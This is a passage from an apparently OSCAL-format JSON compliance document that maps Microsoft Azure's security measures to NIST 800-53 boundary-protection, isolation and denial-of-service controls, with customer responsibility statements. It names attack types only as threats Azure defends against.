use JIT when elevated access is required in the Azure production environment. Unless an approved exception as described below, there is no standing or persistent elevated access to the Azure production environment. The primary exception is emergency elevated access. In other instances of persistent elevated access, where the only access supported is elevated access, access is identified as an exception and approved. This occurs with local accounts on assets, some of which cannot be disabled._x000D_ _x000D_ Azure separates internal traffic from external traffic to achieve greater logical separation as well. Internal traffic uses private address space that is not externally routable. The translation between internal address space and external space is performed at the Azure Load Balancers. Virtual IPs (VIPs) that are externally routable are translated into internal Dynamic IPs (DIPs) that are only routable within Azure. Without the internal IP information, traffic is simply blocked._x000D_ _x000D_"}],"responsibilities":[{"uuid":"aea9cc17-1798-4d04-8d60-619a7ef886a0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-006"}],"description":"The customer is responsible for separating system functionality into two separate categories: user functionality and management functionality.","provided-uuid":"ff004786-471c-46e3-9a04-bf74ef4fc526"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"63b473b0-9011-4585-b0ca-9444039afe78","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-3","statements":[{"uuid":"b9e17192-9e7e-4b5c-b08b-2afd046eb0fa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-3_smt","by-components":[{"uuid":"46feeeed-38c2-44a9-9dc8-b5968dfd6a0e","export":{"provided":[{"uuid":"c533d3ba-f31e-4767-8563-b30f7c9f193b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-007"}],"description":"All Azure assets run modern operating systems as identified in the Azure inventory. These operating systems maintain separate execution domains for each executing process by assigning a private virtual address space to each process. See the following for more information: <https://technet.microsoft.com/en-ca/aa366785%28v=vs.90%29> All Azure servers use either Intel or AMD processors. Both processor types implement isolation by means of protection rings with various privilege levels. User code runs in ring 3, while kernel code runs in ring 0. Security software on the servers, such as antimalware software, is protected using access control lists at the file system level via file permissions. This ensures that only approved users have access to security software. These are technological implementations and are in place continuously. At the network level, Azure implements Jumpboxes, Debug Servers, Hop Boxes, and a VPN to restrict access to security functions. To access security functions, users must first log on to the Jumpboxes, Debug Servers, Hop Boxes, or VPN using multifactor authentication. Azure monitors and audits access using the logging and monitoring pipeline. Azure users must also use JIT to access production assets. In this way, Azure restricts access to security functions by implementing least privilege capabilities throughout the environment."}],"responsibilities":[{"uuid":"36f9f21a-0569-4543-9fb3-66b6cdd863fc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-007"}],"description":"The customer is responsible for isolating security functions from non-security functions for customer-deployed resources.","provided-uuid":"c533d3ba-f31e-4767-8563-b30f7c9f193b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8775da58-8463-4590-806d-13673d386ac7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-4","statements":[{"uuid":"07c3fca0-b39d-4e11-b6e3-d28f3c4d7396","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-008"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-4_smt","by-components":[{"uuid":"111f3499-d69c-4023-ba13-e18a3720e783","export":{"provided":[{"uuid":"5dede073-e3b5-4fae-b57b-f2c53c201b3b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-008"}],"description":"In order to transfer residual information on an Azure asset, the user must first access the asset. Azure prevents unauthorized and unintended information transfer by implementing several technical controls within the network, including isolation via VLANs and Network Security Groups (NSGs), and implementing strict flow control via ACLs to Azure from other internal Microsoft networks and from the internet. Strong access controls including multifactor authentication, JIT, and usage of security groups limit any unauthorized or unintended transfer of information through shared resources at an access control level. Azure performs logging and monitoring on all assets as a detective measure as well._x000D_ _x000D_ Azure follows strict standards for overwriting storage resources before their reuse or the physical destruction of decommissioned hardware. Azure executes a complete deletion of data on customer request and on contract termination._x000D_ _x000D_ Protection of Virtual Machines (VMs) is provided by hypervisor isolation of the Root OS from the Guest OS and the Guest OS from one another. The hypervisor acts like a micro-kernel and passes all hardware access requests from the Guest OS to the Root OS for processing using a shared-memory interface. This prevents users from obtaining raw read/write/execute access to the system and mitigates the risk of sharing system resources._x000D_ _x000D_"}],"responsibilities":[{"uuid":"d9c7585a-17b0-40ff-a42b-7c159d4b197b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-008"}],"description":"The customer is responsible for preventing unauthorized and unintended information transfer between customer-deployed resources.","provided-uuid":"5dede073-e3b5-4fae-b57b-f2c53c201b3b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"361048d7-cfb6-473e-8abf-67bc22647260","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-5","statements":[{"uuid":"af3aee91-0eb4-479b-a759-6cf4c5511a15","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-5_smt.a","by-components":[{"uuid":"51f7ef74-b803-42ef-9142-3390ceb59849","export":{"provided":[{"uuid":"4be238b5-0b55-4f73-96e3-ca4a01ca026f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-009"}],"description":"Azure has implemented protection mechanisms as described in Part b below to protect against three kinds of DoS attacks: attacks on bandwidth, attacks on transactional capacity (authentication overhead, IOPS, cache efficiency, etc.), and attacks on storage capacity."}],"responsibilities":[{"uuid":"e462d9c4-515c-419a-b96e-37034f3cf14a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-009"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for protecting customer-deployed resources from denial of service (DOS) attacks.","provided-uuid":"4be238b5-0b55-4f73-96e3-ca4a01ca026f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"fa0574f6-b59f-48ae-ab07-d40d119cb42a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-5_smt.b","by-components":[{"uuid":"ddd74b68-668f-4046-8017-b5d0f6d8dc19","export":{"provided":[{"uuid":"5f4b2108-a7ed-4754-8965-3a1b03c2ef0b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-010"}],"description":"Azure uses A10 distributed denial of service (DDoS) protection network devices that provide automated detection and mitigation. The DDoS protection solution utilizes Azure Network Monitoring (NetMon) to sample network flow packets and determine if there is an attack. Once the attack is detected, the A10s are used as scrubbers to mitigate attacks. After mitigation, further clean traffic is allowed into the Azure environment. This involves the NetMon and Geneva Monitoring features to detect attacks and use A10 technology to mitigate attacks. This solution is designed to withstand attacks from both outside and inside of Azure. For attacks initiated within Azure to another Azure tenant, trusted IP filters prevent spoofing of dynamic IP (DIP) address. Azure monitors and isolates or removes offending VMs from the network. Additional DoS protection solutions include: * UDP IPv4 and IPv6 flood protection * ICMP IPv4 and IPv6 flood protection * TCP IPv4 and IPv6 flood protection * TCP SYN attack protection for IPv4 and IPv6 * Fragmentation attack protection Azure Storage Azure has implemented protection mechanisms as defined below to protect from DoS attacks on Azure Storage: attacks on bandwidth, attacks on transactional capacity (ICMP (ping) flood, SYN flood, slowloris, buffer overflow attack, and volume attack, etc.), and attacks on storage capacity. Attacks on bandwidth are handled by identifying the IP addresses of assets mounting simple attacks and blocking them as early in the communications stream as possible. The ability to throttle or disable abusive accounts is provided. Storage accounts that suddenly start growing out of proportion to past patterns may represent a DoS attack against a customer or more likely represent a bug in a customer program. This is tracked by actively monitoring bandwidth, transactions, and storage capacity usage and growth by storage account and IP address across the whole storage stamp. If the metrics start to change in an unexpected way, Azure analyzes storage accounts and IP addresses and performs a range of mitigations. This ranges from throttling the accounts or IPs, contacting the customers, or even disabling or putting the accounts or IPs into read-only mode. In addition to dealing with abusive storage accounts and IP address ranges in the above manner, Azure Storage monitors the (a) bandwidth, (b) transactions, and (c) storage capacity for each of the stamps. If any of these metrics reach seventy (70) percent of peak capacity provided by the storage stamp, then Azure Storage load-balances storage accounts via geo-replication migration across the storage stamps preferably within a given geo-location to keep the capacity below this threshold for each production storage stamp. Azure SQL DB Azure has implemented protection mechanisms as defined below to protect from DoS attacks on Azure SQL DB (ICMP (ping) flood, SYN flood, slowloris, buffer overflow attack, and volume attack, etc.). Azure SQL DB gateway performs stateful TDS packet inspection while accepting connections from clients to validate the connection information and pass on the TDS packets to the appropriate server based on the database name specified in the connection string. In the back-end, Azure SQL databases are hosted in tenant rings that are deployed in Virtual Networks (VNets). The OneDDOS system protects traffic coming into these VNets. They define normal thresholds on each endpoint, and if the thresholds are exceeded, they route the traffic through A10 devices which scrub the traffic to prevent DOS attacks. Additionally, Azure SQL Database offers a variety of network access controls so customers can choose between public or private connectivity. Customers can use a combination of these network access controls to control how clients can connect to SQL Database and thus reduce the surface area for DoS attacks. Public connections are blocked by SQL DB firewall and traffic is allowed only when the client IP addresses is added in the form of a firewall rule. Access from resources inside Azure, such as an Azure VM or Web App, can be accomplished by using Service Endpoints and VNet firewall rules. Lastly customers can use private endpoint such that Azure SQL DB is associated with a specific private IP address within a specific VNet and subnet."}],"responsibilities":[{"uuid":"bc45f9b4-2e8d-48f7-b028-35f49e3f10f4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-010"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for protecting customer-deployed resources from denial of service (DOS) attacks.","provided-uuid":"5f4b2108-a7ed-4754-8965-3a1b03c2ef0b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"da0b8744-1ea1-4a52-bb15-d876c85f5921","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7","statements":[{"uuid":"1941785e-9730-4f97-b822-11bb04a785eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7_smt.a","by-components":[{"uuid":"b099ee8d-c309-4049-998a-5bc13f945622","export":{"provided":[{"uuid":"d50606b1-e0d9-48ed-b7eb-14c95cc1090b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-011"}],"description":"Azure implements boundary protection through a defense-in-depth strategy. As a cloud service comprised of numerous service teams and customers, logical isolation and segmentation are critical to the secure operations of Azure. The strategy includes network segmentation through VLAN and Network Security Group (NSG) segmentation, ACL restrictions, and encrypted communications. Internally, at the network level, Azure implements Jumpboxes, Debug Servers, Hop Boxes, and a VPN to restrict access to the Azure environment. To access the environment, users must first log on to the Jumpboxes, Debug Servers, Hop Boxes, or VPN using multifactor authentication. Azure is logically segmented into the management plane, which is heavily restricted to only key service teams necessary to administer underlying networking and foundational services, and the customer plane, upon which all Azure service teams and external customers reside and operate. Internal Azure service teams utilize the same logical isolation techniques that customers use to ensure their deployments are secure. Microsoft utilizes the Azure Security Pack (AzSecPack) service for log generation, consolidation, and monitoring throughout the Azure cloud. The logical isolation of internal and customer infrastructure in a hyperscale cloud is fundamental to maintaining security. The overarching principle for a virtualized solution is to allow only connections and communications that are necessary for that virtualized solution to operate, blocking all other ports and connections by default. Azure Virtual Networks (VNets) ensure that all private network traffic is logically isolated from traffic belonging to other internal and external networks. Virtual Machines (VMs) in one VNet cannot communicate directly with VMs in a different VNet even if both VNets are created by the same user. Networking isolation ensures that communication between VMs remains private within a VNet. VNets provide isolation of network traffic between tenants as part of their fundamental design. A subscription can contain multiple logically isolated private networks, and include firewall, load balancing, and network address translation. Each VNet is isolated from other VNets by default. Multiple deployments inside the same subscription can be placed on the same VNet, and then communicate with each other through private IP addresses. Network access to VMs is limited by packet filtering at the network edge, at load balancers, and at the Host OS level. Each service team additionally configures their host firewalls to further limit connectivity, specifying for each listening port whether connections are accepted from the external networks or only from role instances within the same cloud service or VNet. Azure provides network isolation for each deployment and enforces the following rules: * Traffic between VMs always traverses through trusted packet filters. * Protocols such as Address Resolution Protocol (ARP), Dynamic Host Configuration Protocol (DHCP), and other OSI Layer-2 traffic from a VM are controlled using rate-limiting and anti-spoofing protection. * VMs cannot capture any traffic on the network that is not intended for them. * VMs cannot send traffic to Azure private interfaces and infrastructure services, or to other user's VMs. VMs can only communicate with other VMs owned or controlled by the same team and with Azure service endpoints. * When users put VMs on a VNet, those VMs get their own address spaces that are invisible, and hence, not reachable from VMs outside of a deployment or virtual network (unless configured to be visible via IP addresses). These environments are open only through the ports that users specify for access; if the VM is defined to have an external IP address, then all ports are open for external access. Local connections are disallowed by policy within Azure. No personnel have local access. Azure performs network monitoring and detection of unauthorized connections via Network Isolation (NetIso), which provides the Network Risk Management Service (NRMS) for network baseline measurement, management, and enforcement. The service provides an assessment of network security and alerts on internet-exposed endpoints via Incident Management (IcM) based on analysis patterns for configuration issues. Any process that begins offering an open network port is flagged and investigated if it is not part of the approved baseline for that host to ensure detection of network services that have not been authorized as an indicator of compromise. In addition, the implemented host-based SDN firewall uses a deny all policy. Azure's hyperscale network is designed to provide uniform high capacity between servers, performance isolation between services, and Ethernet Layer-2 semantics. Azure uses a number of networking implementations to achieve these goals: flat addressing to allow service instances to be placed anywhere in the network; load balancing to spread traffic uniformly across network paths; and end-system based address resolution to scale to large server pools, without introducing complexity to the network control plane. These implementations give each service the illusion that all the servers assigned to it, and only those servers, are connected by a single non-interfering Ethernet switch - a Virtual Layer 2 (VL2) - and maintain this illusion even as the size of each service varies from one server to hundreds of thousands. This VL2 implementation achieves traffic performance isolation, ensuring that it is not possible that the traffic of one service could be affected by the traffic of any other service, as if each service were connected by a separate physical switch. The Azure network uses two different IP-address families: * The customer address (CA) is the defined/chosen VNet IP address, also referred to as Virtual IP (VIP). The network infrastructure operates using CAs, which are externally routable. All switches and interfaces are assigned CAs, and switches run an IP-based (Layer-3) link-state routing protocol that disseminates only these CAs. This design allows switches to obtain the complete switch-level topology, as well as forward packets encapsulated with CAs along shortest paths. * The provider address (PA) is the Azure-assigned internal Fabric address that is not visible to users and is also referred to as Dynamic IP (DIP). No traffic goes directly from the external network to an asset; all traffic from external networks must go through a Software Load Balancer (SLB) and be encapsulated to protect the internal Azure address space by only routing packets to valid Azure internal IP addresses and ports. Network Address Translation (NAT) separates internal network traffic from external traffic. Internal traffic uses RFC 1918 address space or private address space - the provider addresses (PAs) - that is not externally routable. The translation from the PA to the CA is performed at the SLBs. CAs - that are externally routable - are translated into internal provider addresses (PAs) that are only routable within Azure. These addresses remain unaltered no matter how their servers' locations change due to virtual-machine migration or reprovisioning. Each PA is associated with a CA, which is the identifier of the Top of Rack (ToR) switch to which the server is connected. VL2 uses a scalable, reliable directory system to store and maintain the mapping of PAs to CAs, and this mapping is created when servers are provisioned to a service and assigned PA addresses. An agent running in the network stack on every server, called the VL2 agent, invokes the directory system's resolution service to learn the actual location of the destination and then tunnels the original packet there. Azure assigns servers IP addresses that act as names alone, with no topological significance. Azure's VL2 addressing scheme separates these server names (PAs) from their locations (CAs). The crux of offering Layer-2 semantics is having servers believe they share a single large IP subnet - i.e., the entire PA space - with other servers in the same service, while eliminating the Address Resolution Protocol (ARP) and Dynamic Host Configuration Protocol (DHCP) scaling bottlenecks that plague large Ethernet deployments. A server cannot send packets to a PA if the directory service refuses to provide it with a CA through which it can route its packets, which means that the directory service enforces access control policies. Further, since the directory system knows which server is making the request when handling a lookup, it can enforce fine-grained isolation policies. For example, it could enforce the policy that only servers belonging to the same service can communicate with each other. To route traffic between servers, which use PA addresses, on an underlying network that knows routes for CA addresses, the VL2 agent on each server captures packets from the host, and encapsulates them with the CA address of the ToR switch of the destination. Once the packet arrives at the CA (i.e., the destination ToR switch), the destination ToR switch decapsulates the packet and delivers it to the destination PA carried in the inner header. The packet is first delivered to one of the Intermediate switches, decapsulated by the switch, delivered to the ToR's CA, decapsulated again, and finally sent to the destination. For external traffic, Azure provides multiple layers of assurance to enforce isolation depending on traffic patterns. When a user places an external IP on their VNet gateway, traffic from the external network that is destined for that IP address will be routed to an Edge Router. Azure then uses Border Gateway Protocol (BGP) to share routing details with the external network to establish end-to-end connectivity. When communication begins with a resource within the VNet, the network traffic traverses as normal until it reaches a Microsoft ExpressRoute Edge (MSEE) Router. In both cases, VNets provide the means for Azure VMs to act as part of the user's external network. A cryptographically protected IPsec/IKE tunnel is established between Azure and user's internal network (e.g., via Azure VPN Gateway or Azure ExpressRoute Private Peering), enabling the VM to connect securely to the user's resources as though it was directly on that network. At the Edge Router or the MSEE Router, the packet is encapsulated using Generic Routing Encapsulation (GRE). This encapsulation uses a unique identifier specific to the VNet destination and the destination address, which is used to appropriately route the traffic to the identified VNet. Upon reaching the VNet Gateway, which is a special VNet used only to accept traffic from outside of an Azure VNet, the encapsulation is verified by the Azure network fabric to ensure: * the endpoint receiving the packet is a match to the unique VNet ID used to route the data, and * the destination address requested exists in this VNet. Once verified, the packet is routed as internal traffic from the VNet Gateway to the final requested destination address within the VNet. This approach ensures that traffic from external networks travels only to the Azure VNet for which it is destined, enforcing isolation. Internal traffic also uses GRE encapsulation/tunneling. When two resources in an Azure VNet attempt to establish communications between each other, the Azure network fabric reaches out to the Azure VNet routing directory service that is part of the Azure network fabric. The directory services use the customer address (CA) and the requested destination address to determine the provider address (PA). This information, including the VNet identifier, CA, and PA, is then used to encapsulate the traffic with GRE. The Azure network uses this information to properly route the encapsulated data to the appropriate Azure host using the PA. The encapsulation is reviewed by the Azure network fabric to confirm: * the PA is a match, * the CA is located at this PA, and * the VNet identifier is a match. Once all three are verified, the encapsulation is removed and routed to the CA as normal traffic (e.g., to a VM endpoint). This approach provides VNet isolation assurance based on correct traffic routing between cloud services. Azure VNets implement several mechanisms to ensure secure traffic between tenants. These mechanisms align to existing industry standards and security practices, and prevent well-known attack vectors including: * Prevent IP address spoofing - Whenever encapsulated traffic is transmitted by a VNet, the service reverifies the information on the receiving end of the transmission. The traffic is looked up and encapsulated independently at the start of the transmission, as well as reverified at the receiving endpoint to ensure the transmission was performed appropriately. This verification is done with an internal VNet feature called SpoofGuard, which verifies that the source and destination are valid and allowed to communicate, thereby preventing mismatches in expected encapsulation patterns that might otherwise permit spoofing. The GRE encapsulation processes prevent spoofing as any GRE encapsulation and encryption not done by the Azure network fabric is treated as dropped traffic. * Provide network segmentation across service teams with overlapping network spaces - Azure VNet's implementation relies on established tunneling standards such as the GRE, which in turn allows the use of specific unique identifiers (VNet IDs) throughout the cloud. The VNet identifiers are used as scoping identifiers. This approach ensures that a service team is always operating within their unique address space, overlapping address spaces between tenants, and the Azure network fabric. Anything that has not been encapsulated with a valid VNet ID is blocked within the Azure network fabric. In the example described above, any encapsulated traffic not performed by the Azure network fabric is discarded. * Prevent traffic from crossing between VNets - Preventing traffic from crossing between VNets is done through the same mechanisms that handle address overlap and prevent spoofing. Traffic crossing between VNets is rendered infeasible by using unique VNet IDs established per tenant in combination with verification of all traffic at the source and destination. Users do not have access to the underlying transmission mechanisms that rely on these IDs to perform the encapsulation. Consequently, any attempt to encapsulate and simulate these mechanisms would lead to dropped traffic. In addition to these key protections, all unexpected traffic originating from external networks is dropped by default. Any packet entering the Azure network will first encounter an Edge router. Edge routers intentionally allow all inbound traffic into the Azure network except spoofed traffic. This basic traffic filtering protects the Azure network from known bad malicious traffic. Azure also implements DDoS protection at the network layer, collecting logs to throttle or block traffic based on real time and historical data analysis, and mitigates attacks on demand. Moreover, the Azure network fabric blocks traffic from any IPs originating in the Azure network fabric space that are spoofed. The Azure network fabric uses GRE and Virtual Extensible LAN (VXLAN) to validate that all allowed traffic is Azure-controlled traffic and all non-Azure GRE traffic is blocked. By using GRE tunnels and VXLAN to segment traffic using unique keys, Azure meets RFC 3809 and RFC 4110. When using Azure VPN Gateway in combination with ExpressRoute, Azure meets RFC 4111 and RFC 4364. With a comprehensive approach for isolation encompassing external and internal network traffic, Azure VNets provide customer with assurance that Azure successfully routes traffic between VNets, allows proper network segmentation for tenants with overlapping address spaces, and prevents IP address spoofing. Service teams are also able to utilize Azure services to further isolate and protect their resources. Using Network Security Groups (NSGs), a feature of Azure Virtual Network, service teams can filter traffic by source and destination IP address, port, and protocol via multiple inbound and outbound security rules - essentially acting as a distributed virtual firewall and IP-based network Access Control List (ACL). Service teams can apply an NSG to each NIC in a Virtual Machine, apply an NSG to the subnet that a NIC, or another Azure resource, is connected to, and directly to Virtual Machine Scale Sets, allowing finer control over the service team infrastructure. At the infrastructure layer, Azure implements a Hypervisor firewall to protect all tenants running on top of the Hypervisor within virtual machines from unauthorized access. This Hypervisor firewall is distributed as part of the NSG rules deployed to the Host, implemented in the Hypervisor, and configured by the Fabric Controller agent. The Host OS instances utilize the built-in Windows Firewall to implement fine-grained ACLs at a greater granularity than router ACLs and are maintained by the same software that provisions tenants, so they are never out of date. They are applied using the Machine Configuration File (MCF) to Windows Firewall. At the top of the operating system stack is the Guest OS, which service teams utilize as their operating system. By default, this layer does not allow any inbound communication to cloud service or virtual network, essentially making it part of a private network."}],"responsibilities":[{"uuid":"2e8a1ff7-70cc-4c5a-8e3a-d4217b3540ca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-011"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for monitoring and controlling communications at and within the managed interfaces of the customer-deployed system.","provided-uuid":"d50606b1-e0d9-48ed-b7eb-14c95cc1090b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0a5dc267-c8a9-4b68-b417-a50e10db460c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7_smt.b","by-components":[{"uuid":"90578d33-4e87-4cc4-b773-9e31734ea878","export":{"provided":[{"uuid":"a27f5e3b-62f5-4707-97f6-9cfc10bf6cea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-012"}],"description":"The only externally accessible components of Azure are the load balancers and the externally-facing server roles. All non-externally accessible Azure components connect to the load balancers via physically separate network interfaces on subnets that are logically separated from internal subnets. The hypervisor is isolated from interactions by virtual machines on port 80. Azure employs Remote Desktop Protocol (RDP)and SSL VPN as the internal/external managed interface for interactive access to the Azure environment. Azure requires encrypted connections for connectivity from any of the solutions used to access the environment in accordance with Microsoft security architecture requirements."}],"responsibilities":[{"uuid":"6808aa07-2ee7-44bf-822f-482f2aa90010","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-012"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for implementing subnetworks for customer-deployed resources to logically separate publicly accessible resources from internal resources.","provided-uuid":"a27f5e3b-62f5-4707-97f6-9cfc10bf6cea"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"f6325f66-1947-4c52-96e6-5f6c1c31bb79","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7_smt.c","by-components":[{"uuid":"da541d0d-c327-48ef-9fe2-758959899f5f","export":{"provided":[{"uuid":"68d46e3c-ffb2-4e91-aa2a-4a6934732fa0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-013"}],"description":"Azure connects to external networks or information systems only through Azure Networking's managed networks and Edge Routers. The network interfaces provide boundary protection at the Edge Router network level and are arranged in accordance with the Microsoft and Azure security architectures. Additional measures in place to help protect Azure information systems from malicious activities include: * Software load balancers * Non-routable IP addressing * Packet filtering * Host-based firewalls * VLAN and NSG isolation * Jumpboxes, Debug Servers, Hop Boxes, and VPNs All traffic at the boundary is restricted to authorized connections as defined by the service team."}],"responsibilities":[{"uuid":"655ee693-9b87-4025-86e1-0967e5e340ae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-013"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for restricting connections to external networks or systems through managed interfaces, consisting of boundary protection devices arranged in accordance with the customer's security and privacy architecture.","provided-uuid":"68d46e3c-ffb2-4e91-aa2a-4a6934732fa0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"119e5131-c95b-48b4-8be5-3aa81f4caa33","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.3","statements":[{"uuid":"c4b90a2e-055c-4315-a448-486f0eb6a714","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-014"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.3_smt","by-components":[{"uuid":"cb9cc065-34c5-41b2-8e2c-20aa230ef7f6","export":{"provided":[{"uuid":"65203d42-d4fa-4063-bb42-5c9d49e83911","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-014"}],"description":"Azure controls and monitors all inbound and outbound traffic through a limited number of network access points at the boundary and at key points within Azure. Azure leverages the following security mechanisms to limit the number of external network connections:_x000D_ _x000D_ * Load balancing and limiting inbound access to Azure, Azure Management Portal, front-end (e.g. FFE, XFE, RDFE), and customer VM RDP. Each datacenter contains two groups of Jumpboxes, Debug Servers, and Hop Boxes behind a load balancer to limit the access points for Azure internal traffic, and customer traffic passes through a load balancer as well. Both entry points are monitored and generate audit logs and alerts in near-real time._x000D_ * Jumpboxes, Debug servers, and Network Hop Boxes control all access to Azure._x000D_ * Azure services are only accessible to customer users through the Azure provisioning portal and Web Services (REST API) interfaces._x000D_ _x000D_"}],"responsibilities":[{"uuid":"2c5d9ae9-2629-4ca5-b7b4-1df9306e2569","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-014"}],"description":"The customer is responsible for limiting the number of external connections established to the customer-deployed system.","provided-uuid":"65203d42-d4fa-4063-bb42-5c9d49e83911"}]},"description":"See inheritance and customer responsibility 